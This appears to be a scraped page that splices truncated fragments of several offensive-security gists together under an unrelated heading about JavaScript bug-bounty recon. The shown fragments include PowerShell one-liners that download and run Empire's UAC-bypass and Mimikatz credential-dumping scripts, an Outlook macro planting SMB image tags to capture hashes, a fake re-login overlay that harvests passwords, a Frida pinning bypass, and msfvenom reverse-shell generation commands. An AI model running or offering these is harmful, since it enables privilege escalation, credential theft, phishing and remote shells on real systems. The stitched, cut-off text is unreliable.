This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
| Sub HTMLMessage() | |
| Dim objOutlookMsg As Outlook.MailItem | |
| Dim message, title, defaultValue As String | |
| Dim myValue As String | |
| ' prompt for user input. | |
| message = "Enter SMB Tag(s)" | |
| ' Set popup box title. | |
| title = "SMB Input Box" | |
| defaultValue = "<img src='file://IPADDRESS/image/signature.jpg'><img src='file:\\IPADDRESS\image\signature.jpg'>" | |
| ' Prompt input box |
| var html = ` | |
| <div id="bg" style="position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0"> | |
| </div> | |
| <div id="form" style="position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px"> | |
| <p>An error occurred. Please login again.</p> | |
| <form method="GET" action="https://127.0.0.1:443/"> | |
| <p>Username <input type="text" name="username"></p> | |
| <p>Password <input type="password" name="password"></p> | |
| <p><input type="submit" value="Login"></p> | |
| </form> |
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); |
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| import requests | |
| import json | |
| import sys | |
| import argparse | |
| _strip = ['http://', 'https://', 'www'] | |
| G = '\033[92m' | |
| Y = '\033[93m' |
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf #Create ELF file | |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe #Create .exe file | |
| msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho #Create Mach-O file | |
| msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #Reverse PHP Shell | |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp #Reverse ASP Shell | |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp #Reverse JSP Shell | |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war #Reverse WAR Shell | |
| msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your P |